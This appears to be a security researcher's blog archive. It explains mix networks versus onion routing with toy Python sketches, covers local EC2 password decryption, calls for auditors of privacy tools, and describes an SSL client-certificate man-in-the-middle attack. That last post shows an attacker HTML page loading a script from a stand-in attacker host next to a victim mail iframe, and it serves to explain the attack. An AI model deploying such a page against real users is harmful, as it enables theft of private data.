As was pointed out in a recent comment on the first blog post I wrote on crypto.is, I had used the terms "mix network" and "onion routing" almost interchangeably. In actuality I had fallen into a trap that a fair number of people familiar with the space have fallen into: using those terms without a solid differentiation. This blog post aims to correct that.
Firstly, I must give credit where credit is due - Paul Syverson (one of the original authors of Tor) wrote the paper that cemented this in my head most clearly, and I will quote it, and then restate it with pictures:
Mix networks get their security from the mixing done by their component mixes, and may or may not use route unpredictability to enhance security. Onion routing networks primarily get their security from choosing routes that are difficult for the adversary to observe, which for designs deployed to date has meant choosing unpredictable routes through a network. And onion routers typically employ no mixing at all. This gets at the essence of the two even if it is a bit too quick on both sides. Mixes are also usually intended to resist an adversary that can observe all traffic everywhere and, in some threat models, to actively change traffic. Onion routing assumes that an adversary who observes both ends of a communication path will completely break the anonymity of its traffic. Thus, onion routing networks are designed to resist a local adversary, one that can only see a subset of the network and the traffic on it.
Onion Routing gets its security from the fact (or assumption) that it is difficult for an adversary to position itself on networks such that it is able to view all the nodes in the route. Practically speaking, if I built a route from my job in China, to a server in Australia, to a server in Russia, to a server in Sweden, and then visit a webpage in France - there are a number of adversaries who could see part of this path. For example: my employer, my employer's Internet Service Provider, the Chinese, Australian, Russian, Swedish, and French Governments, the website operator and their Internet Service Provider. But none of those entities are able to see the entire path (we hope!) because they do not own, control, or have direct influence over every network link I'm using. In this instance, Onion Routing can provide some security.
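The layered structure behind such a route can be sketched as a toy model. This is not real cryptography (a real network encrypts each layer to that hop's public key), and the hop names and message are illustrative - the point is only that each node learns just the next hop, never the whole route:

```python
# Toy sketch of onion routing's layered structure. No real crypto here:
# each "layer" is just a dict naming the next hop; in a real network
# each layer would be encrypted to that hop's public key.

def wrap(route, message):
    """Build the 'onion': the innermost layer holds the message, and
    each outer layer names only the next hop."""
    onion = {"deliver": message}
    for hop in reversed(route):
        onion = {"next": hop, "payload": onion}
    return onion

def peel(onion):
    """One node peels one layer: it learns the next hop and passes the
    inner payload along, still opaque to it in a real network."""
    return onion["next"], onion["payload"]

route = ["Australia", "Russia", "Sweden"]
onion = wrap(route, "GET france.example")
hop, layer = peel(onion)  # the first node learns only "Australia"
```

Each node in the chain calls the equivalent of peel() once, so no single node (we hope!) ever holds both the sender's identity and the final destination.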
Onion Routing Attacked
But if an adversary is able to see the entire path, Onion Routing loses its security. I recently used a crowd of people in a real-life demonstration of this. Alice puts a message into an opaque film canister and passes it to an onion routing node, who passes it to another, who passes it to another, who takes the message out of the canister and hands it to the recipient, Bob. Everyone in the room can clearly see that it was Alice who passed a message to Bob, and even if there were multiple messages being passed, anyone could focus on an individual and watch where the film canister they passed wound up.
There have been rumors and talk in the past of China or Iran cutting themselves off from the Internet and making their own national Internet. If they did, we could not just stand up a Tor network inside the country: it would provide no security, because the government would be able to see the entire path.
There is another scenario where Onion Routing is known to fall down. If the adversary can see one node (A), and later another node (C) - even if there is an unseen or unknown number of nodes between A and C, an attacker can correlate the traffic. A specific instance of this means if an attacker can see you, and can see the website you're visiting, even if you create a path outside the adversary's control - they will still be able to correlate the traffic and learn you are visiting the website. This clearly raises concerns about using Onion Routing to visit a company website or websites related to your own government.
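That correlation can be sketched with a toy timing comparison - the timestamps, the assumed network delay, and the tolerance below are purely illustrative, but they show how an adversary watching only points A and C can match up flows without seeing anything in between:

```python
# Hedged sketch of end-to-end traffic correlation: the adversary sees
# only packet times at node A (entry) and node C (exit) and checks
# whether the exit pattern is the entry pattern shifted by a plausible
# network delay. All numbers are made up for illustration.

def correlate(entry_times, exit_times, latency=0.05, tolerance=0.02):
    """Fraction of entry packets with a timing-consistent exit packet."""
    matches = 0
    for t in entry_times:
        if any(abs((t2 - t) - latency) <= tolerance for t2 in exit_times):
            matches += 1
    return matches / len(entry_times)

alice_entry = [0.00, 0.31, 0.74, 1.12]          # seen near Alice
site_exit   = [0.05, 0.36, 0.79, 1.17]          # seen near the website
score = correlate(alice_entry, site_exit)       # same pattern, shifted
```

A score near 1.0 tells the adversary these two traffic patterns are almost certainly the same flow - which is exactly why seeing both ends breaks onion routing.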
Mixing, however, is specifically designed to provide security even if an adversary can see the entire path. To demonstrate this to a crowd of people I had Alice, Bob, and Carol each submit messages, in opaque film canisters, into my mix node (my backpack). With all three film canister messages in my bag, I shook it, and distributed each message to a new mix node, each of which also had a couple of messages in their bags already. Then those nodes distributed messages to 6 more mix nodes, and those mix nodes opened the messages and distributed them to recipients. Although everyone was able to see all of the messages that were passed around, it's impossible to tell who got Alice's, Bob's, or Carol's specific message. The mixing, in backpacks, creates uncertainty that the attacker is not able to overcome.
Mixing isn't perfect. An adversary can still conduct long-term correlation attacks, and if no one or almost no one uses the mix network along with you, it's even easier to attack. Furthermore, just because mix networks provide stronger security against a stronger adversary does not mean they provide better security in general. If you'd like to learn why, you can wait a while until I post about it, or just skip the middleman and read Sleeping dogs lie on a bed of onions but wake when mixed by Paul Syverson.
A Mix Node must collect more than one message before sending any out - otherwise the node is behaving as an onion routing node with a time delay. The more messages collected, the more uncertainty is introduced as to which message went where. The specific mixing algorithms employed (often called pooling algorithms) will be the subject of a future blog post, but it's clear there must be multiple messages, which means the collected messages will generally sit in a mix node until 'sufficient' messages are collected (for some definition of sufficient). This introduces latency. If a mix node waits six hours to collect messages - well, that's up to six hours of latency. Accordingly, mix networks are often casually referred to as 'high latency' and onion routing networks as 'low latency'. But the latency doesn't impart security - it's the mixing.
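One of the simplest pooling strategies is a threshold mix, sketched below with an assumed threshold of three, which makes the latency/uncertainty trade-off concrete: messages sit in the pool (latency) until the threshold is reached, and then flush together in a random order (uncertainty):

```python
# Minimal sketch of a threshold mix, one simple pooling algorithm.
# The threshold and messages are illustrative.
import random

class ThresholdMix:
    def __init__(self, threshold):
        self.threshold = threshold
        self.pool = []

    def receive(self, message):
        """Hold messages until the pool is full, then flush the whole
        batch in a shuffled order; returns None while still waiting."""
        self.pool.append(message)
        if len(self.pool) >= self.threshold:
            batch, self.pool = self.pool, []
            random.shuffle(batch)
            return batch
        return None

mix = ThresholdMix(threshold=3)
mix.receive("from Alice")            # held - nothing sent yet
mix.receive("from Bob")              # held - nothing sent yet
batch = mix.receive("from Carol")    # pool full: all three flush together
```

An observer sees three messages go in and three come out at once, with no way to tell from the traffic alone which output corresponds to which input.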
Tor is an Onion Routing network. It employs no mixing, and barring normal system task scheduling and processing, messages are sent as soon as they are received. The attacks described against onion routing above can and have been shown to work against Tor. While there is no evidence a government has resorted to performing the types of statistical attacks described in academic papers, they have done rudimentary correlation involving physical surveillance. Specifically: they watched a suspect arrive home, they watched some Tor traffic originate from his home, and they watched as the nickname they suspected was his appeared in the IRC channel. If you're curious, you can read more about that over here. Although Tor is a powerful tool, it is possible to distinguish Tor traffic from normal traffic, and it is possible to perform correlation-based attacks to de-anonymize your use of it.
Something to keep in mind is that deployed mix networks (Mixmaster, Mixminion) are not designed to disguise the fact that you are using a mix network. If an adversary can simply lock you up for using anonymity tools, you need to disguise your use of anonymity tools - which is a whole other topic. Similarly, these tools are relatively obscure, and if an adversary can look across a large quantity of email traffic for someone who has received a Mixmaster message but had not previously, simple correlation may also be possible.
This post originally appeared on crypto.is. Comments will be moved there.
If you spin up a Windows Instance on Amazon EC2, the only way to get your password for it is to use an Amazon-provided command-line tool to decrypt the password (supplying your private SSH key) or to paste your private SSH key into the Web Interface. That didn't sit too well with me. I'd prefer Amazon not have my private SSH key.
The password is padded with PKCS#1 1.5, encrypted, and then put through some odd byte/hex transformations. If you'd like to decrypt the password yourself, locally, I've put up a script on github to do so. It doesn't handle every corner case (encrypted keys being the biggest), but hopefully it helps you a little.
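As a taste of what's involved, here is a stdlib-only sketch of just the PKCS#1 v1.5 unpadding step. The RSA decryption itself requires your private key, and the example block below is fabricated for illustration - it is not a real EC2 password blob:

```python
# Sketch of stripping PKCS#1 v1.5 (block type 2) padding after RSA
# decryption. A real encryption block looks like:
#   0x00 0x02 <at least 8 nonzero random bytes> 0x00 <message>

def strip_pkcs1_v15(padded: bytes) -> bytes:
    """Return the message portion of a PKCS#1 v1.5 type-2 block."""
    if padded[:2] != b"\x00\x02":
        raise ValueError("not a PKCS#1 v1.5 block type 2")
    sep = padded.index(b"\x00", 2)   # first zero byte ends the padding
    return padded[sep + 1:]

# Fabricated example block: header, 8 'random' bytes, separator, message.
block = b"\x00\x02" + b"\xaa" * 8 + b"\x00" + b"hunter2"
password = strip_pkcs1_v15(block)    # → b"hunter2"
```

In practice you would base64-decode the blob Amazon hands back, RSA-decrypt it with your key pair's private key, and then strip the padding as above.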
Liberation Technology is kind of a catch-all bucket I borrowed from Stanford's Program & Listserv that I use to describe technology that's designed to be used by activists, journalists, folks with increased privacy needs (survey participants, whistleblowers, law enforcement), and the like. (I'm probably offending or upsetting someone by using this term willy-nilly, but I don't have a better one.) These types of applications obviously have a higher bar for security: not only do they need to be free from the major 'bad' vulnerabilities like SQL Injection and Memory Corruption - but thought and attention also need to be paid to things like "What third party requests are made?" and "What does my use of this application leak to a network observer?"
There is a dearth of folks who are good at reviewing these applications, and of the ones there are, their time is spread too thinly - ultimately it's nobody's job, so it's done in their free time. To that end, I took a stab at putting all the things I've picked up over the years together, in an effort to get more folks involved in the process. That list (sponsored by my employer) lives over here at github. It's aimed directly at fellow security consultants, and intended to list additional technical issues to search for when auditing these types of applications. I'm not nearly the best at this, and I don't do as much as I'd like to, but it's something, and you can improve or fork it.
What should you target with these ideas? Everything! There are high-profile applications like the ones by the Tor Project, Whisper Systems, and the Guardian Project. There are newer flashy projects like Cryptocat, MEGA, and Crypton. And there are brand-new projects that might take a bit of reverse engineering to understand - like Wickr and Silent Circle. And this is not an exhaustive list. The number of these types of applications has been increasing significantly in the past couple of years. The number of auditors has not.
I hope this list will inspire more people to look at these applications and contribute to them.
This post originally appeared on iSEC Partners' blog.
I don't write a lot, so when I do write for another blog (usually an employer's) I tend to go to pains to copy the blog post here (with a credit). Today I've published five technical blog posts for another blog, but I'm not reposting them - I'm just pointing at them. They're hosted on the same machine as this one, just on a separate domain, so I'm not worried about losing them.
Crypto.is kicks off its blog with a series of articles about remailers! These are the first several installments in what is intended to be a series on how remailers work, the theory behind them, and many of the choices that must be considered. Some of the topics we intend to dive deeply into in the future are how to have a directory of remailer nodes, how to handle messages that overflow the packet size, more details on Mixminion, as-yet-unimplemented academic papers (like Pynchon Gate and Sphinx), and more! Check out posts One, Two, Three, Four, and Five. The comments section should work, so please do leave comments if you have questions, insights, or corrections!
These blog posts are:
1. What is a Remailer? (05 Jan 2013 23:44:00 EST by Tom Ritter)
2. Remailers We've Got (05 Jan 2013 23:45:00 EST by Tom Ritter)
3. Tagging Attacks (05 Jan 2013 23:46:00 EST by Tom Ritter)
4. Packet Formats 1 of 3(?) (05 Jan 2013 23:47:00 EST by Tom Ritter)
5. A Tagging Attack on Mixmaster (05 Jan 2013 23:48:00 EST by Tom Ritter)
I put a lot of effort into them, and it goes into (what I think) are fairly complicated topics like tagging attacks, so I hope you like them!
SSL is designed to provide Authenticity, Confidentiality, and Integrity. If an attacker is performing a Man in the Middle attack, they can slow down or close an SSL connection - but they cannot modify or learn the contents. The attacker should also not be able to impersonate the server - that's the Authenticity part. But Authenticity relies on Certificate Authorities - the attacker cannot impersonate a site because a CA will verify the applicant controls the domain applied for. But in the past couple of years, we've seen some cracks there that have allowed advanced attackers to impersonate arbitrary and high-profile sites on the Internet. And of course, non-validating clients or installing a rogue CA into your trust store would make this easy too.
Most websites authenticate a user using a username and password sent over HTTPS. If an attacker is able to impersonate a website to a user, they can use that ability to steal the username and password, talk to the website pretending to be the user, and proxy the data back and forth. Client certificates provide a stronger degree of authentication. An attacker can impersonate a website to a user, but cannot impersonate the user to the website, because they do not know the client's private key. This severely limits the attacker: generally speaking the attacker is interested in learning the user's stored data on the server - for example the user's email. To accomplish this when the user authenticates with client certificates, the attacker would need the client certificate - to retrieve it they would have to exploit the user's browser or try a social engineering attack to trick the user into running malware manually. While those attacks are possible, they are not reliable or stealthy.
With this new attack technique, Alice tries to connect to Bob, but is intercepted by Mallory. Mallory impersonates Bob to Alice, and requests a client certificate, which Alice expects. Alice selects her client certificate, which Mallory will accept without performing any certificate validation. After the TLS handshake is complete, Mallory returns a page that looks like this:
<html><body> <script src="https://mallory.com/d.js"></script> <iframe src="https://mail.corp.com" /> </body></html>
Mallory also sends an HTTP Connection: close directive and closes the SSL and TCP connection.
Unfortunately, there's not much that can be changed in browsers to mitigate this attack. Any form of short-term certificate pinning (as is done with DNS to thwart DNS Rebinding) will break some use of certificates on the internet: either different certificates on subdomains, CDNs, paths that route to a new webserver, or the case where every webserver has its own SSL Certificate (the 'Citi Bank' problem, as dubbed by Moxie).
This post originally appeared on iSEC Partners' blog.